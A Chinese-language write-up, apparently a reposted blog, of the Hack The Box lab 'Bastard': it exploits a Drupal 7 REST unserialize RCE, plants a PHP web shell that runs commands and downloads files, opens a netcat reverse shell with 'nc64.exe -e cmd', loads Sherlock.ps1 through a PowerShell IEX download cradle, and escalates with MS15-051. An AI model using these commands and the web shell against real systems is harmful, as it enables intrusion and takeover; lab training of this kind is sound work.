HTB系列之七:Bastard

此次挑戰的是 HTB 的第7臺靶機:Bastardphp

技能收穫:git

  • PHP Unserilaize
  • CMS Version Identify
  • Windows privilege escalation :Sherlock

信息收集

基本信息

Bastard IP:10.10.10.9
Kali IP:10.10.14.23github

端口枚舉

nmap -A -p- -v -T4 10.10.10.9

發現開啓了80(IIS),訪問之shell

看起來是drupal cms,訪問 robots.txt ,發現版本變動文件json

版本:Drupal 7.54windows

漏洞發現

searchsploit drupal 7.x

該版本存在 rce ,編輯 exploitsession

該exploit會進攻由服務擴展建立的REST端點,咱們只須要找出REST端點的名稱便可利用該漏洞。curl

經過目錄枚舉,咱們發現 endpoint 爲 /rest,用其替換exploitide

gobuster -q dir --url http://10.10.10.9 -t 50 --wordlist ./word.txt

漏洞利用

php exp.php

沒有反應,掛上 burpsuite 看看ui

設置 exp 的target爲 burp 的監聽端口

依然沒回應,那應該是缺乏php包,未成功發送

檢查發現,Kali缺乏 php-curl 包,安裝好成功返回響應並寫入 shell.php

apt install php-curl

利用 session.json 能夠僞造會話,成功登陸

已知目標是 x64 的系統,咱們上傳 nc.exe

下載地址:https://eternallybored.org/misc/netcat/

給 exp 添加一個文件上傳功能,也能夠使用 smb文件共享,使用 copy \ip\nc64.exe nc.exe上傳

$phpmine = <<<'EOD'
<?php 
if(isset($_GET['fupload'])){  file_put_contents($_GET['fupload'],file_get_contents("http://10.10.14.15:8000/".$_GET['fuploa'])); 
};
if(isset($_GET['fexec'])){
  echo "<pre>" . shell_exec($_GET['fexec']) . "</pre>"; 
};
?>
EOD;
 
$file = [ 
     'filename' => 'cmd.php',      
     'data' => $phpmine 
];
10.10.10.9/233.php?fupload=nc64.exe&fexec=nc64.exe -e cmd 10.10.14.15 4444

權限提高

git clone git clone https://github.com/rasta-mouse/Sherlock.git

Sherlock是一個在Windows下用於本地提權的PowerShell腳本

http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -

提示 ms15-051 , 利用之

提權程序下載地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip

上傳並運行

創建 nc 會話

至此完成

參考文章

Drupal 7.x RCE 漏洞分析 附EXP:

https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/



轉載請聯繫做者並註明出處!

相關文章
相關標籤/搜索